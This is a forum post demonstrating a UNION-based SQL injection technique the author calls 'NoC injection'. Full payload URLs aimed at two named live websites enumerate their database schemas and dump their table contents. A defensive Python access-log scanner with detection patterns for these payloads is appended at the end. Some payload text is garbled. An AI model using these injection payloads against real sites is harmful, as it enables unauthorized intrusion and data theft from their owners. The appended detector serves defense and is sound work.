I thought of something.
Basically, we don't need to know the column names (username, password, id, etc.); we just need to know the column count.
Therefore the DIOS part (table : column, table : column) is unnecessary.
Instead of it, we will make a different query, for "table : column count".
Code:
http://mathman.dreamhosters.com/MathMan/Organization.php?id=7
and 0 union select 1,2,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat (@,concat_ws(0x203a20,c,(select
count(d) from (SELECT
1`A`,2`B`,3`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`,15`O`
,16`P`,17`Q`,18`R`,19`S`,20`T` UNION SELECT * FROM
information_schema.columns)x where c=q.c)),0x3c62723e)),@),4,5,6,7,8,9
We can also improve it and pull out the table rows, to know which tables we should ignore.
Code:
http://mathman.dreamhosters.com/MathMan/Organization.php?id=7
and 0 union select 1,2,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat
(@,b,0x2e,c,0x3c62723e632e63203a20,(select count(d) from (SELECT
1`A`,null`B`,null`C`,null`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14
`N`,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T` UNION SELECT * FROM
information_schema.columns)x where
c=q.c),0x3c62723e726f7773203a20,h,0x3c62723e3c62723e)),@),4,5,6,7,8,9
db.table
c.c - column count
rows - table rows.
I'm getting to like this "no columns injection" - NoC injection.
Another example.
Step 1 -
Code:
http://www.icdcprague.org/index.php?id=10' and 0 union select 1,2,3,4,5,6-- -
Step 2 -
Code:
http://www.icdcprague.org/index.php?id=10'
and 0 union select 1,2,3,concat_ws(@:=0x0,(select''from (SELECT
1`A`,null`B`,null`C`,4`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14`N`
,15`O`,16`P`,17`Q`,18`R`,19`S`,20`T`,21`U` UNION SELECT * FROM
information_schema 0.e.tables)q where
b!='information_schema'and@:=concat (@,c,0x3c62723e632e63203a20,(select
count(d) from (SELECT
1`A`,null`B`,null`C`,null`D`,5`E`,6`F`,7`G`,8`H`,9`I`,10`J`,11`K`,12`L`,13`M`,14
`N`,15`O`,16`P`,17`Q`,18`R`,19`S` UNION SELECT * FROM
information_schema.columns)x where
c=q.c),0x3c62723e726f7773203a20,h,0x3c62723e3c62723e)),@),5,6-- -
Step 3 -
Code:
http://www.icdcprague.org/index.php?id=10'
and 0 union select 1,2,3,concat_ws(@:=0x0,(select''from (SELECT
null`A`,null`B`,null`C`,null`D`,null`E`,null`F`,null`G`,null`H`,null`I`,null`J`,
null`K` union select * from news union select * from prison union
select *,null from photos union select *,null,null,null,null,null,null
from flags union select *,null,null,null,null,null,null,null,null,null
from forma union select *,null,null,null,null,null,null,null,null from
gallery union select *,null,null,null,null,null from pages union select
*,null,null,null,null,null,null,null,null,null from stat union select
*,null,null,null,null,null,null,null,null,null from test union select
*,null,null,null,null,null,null,null,null,null from tree)q
where@:=concat
(@,concat_ws(0x203a20,a,b,c,d,e,f,g,h,i,j,k),0x3c62723e)),@),5,6-- -
Be sure to avoid the HF copy-paste bug.
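From the defender's side, the three steps above leave a very recognisable trail in a web server's access log: a UNION SELECT grafted onto the id parameter, reads of information_schema, MySQL user-variable assignments (@:=), the hex literal 0x3c62723e (the "<br>" row separator) and the "-- -" comment tail. The following is an added example, not code from the original post, that scans constructed Apache-style log lines for those indicators; the hosts, addresses and timestamps are placeholders, and the indicator list is a heuristic chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); the
# addresses, paths and timestamps are placeholders made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=10%27%20and%200%20union%20select%201,2,3,4,5,6--%20- HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /index.php?id=10%27%20and%200%20union%20select%201,2,3,concat_ws(@:=0x0,(select%27%27from%20information_schema.tables)),5,6--%20- HTTP/1.1" 200 9811
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /Organization.php?id=7 HTTP/1.1" 200 2210
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /search.php?q=union%20station HTTP/1.1" 200 3301
"""

# Indicators drawn from the shape of the payloads in the post. Each is a
# heuristic; a hit is a reason to look, not proof of compromise.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("user_var_assign", re.compile(r"@\s*:=")),          # MySQL @:=... accumulator
    ("hex_br_separator", re.compile(r"0x3c62723e")),     # hex for "<br>"
    ("comment_tail", re.compile(r"--\s*-")),             # "-- -" comment terminator
]

# Common/combined log format: ip ident user [time] "method target proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_query(target):
    """Return the URL-decoded, lower-cased query string of a request target ('' if none).
    Decoding first is what makes %27 and %20 in the log readable as ' and space."""
    if "?" not in target:
        return ""
    return unquote_plus(target.split("?", 1)[1]).lower()


def match_indicators(query):
    """Names of all indicators present in an already-decoded query string, in list order."""
    return [name for name, rx in INDICATORS if rx.search(query)]


def scan_log(text):
    """Parse each log line and report requests whose query string matches an indicator.
    Two or more indicators on one request are rated high, a single one medium."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        target = m.group("target")
        hits = match_indicators(decode_query(target))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "path": target.split("?", 1)[0],
                "indicators": hits,
                "severity": "high" if len(hits) >= 2 else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['path']} {','.join(f['indicators'])}")
```

The decode-then-match order matters: matching on the raw log line would miss %20-encoded keywords, which is how the payloads appear in most server logs. The benign "union station" search is deliberately in the sample to show that the union_select rule requires the SELECT keyword rather than the bare word.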
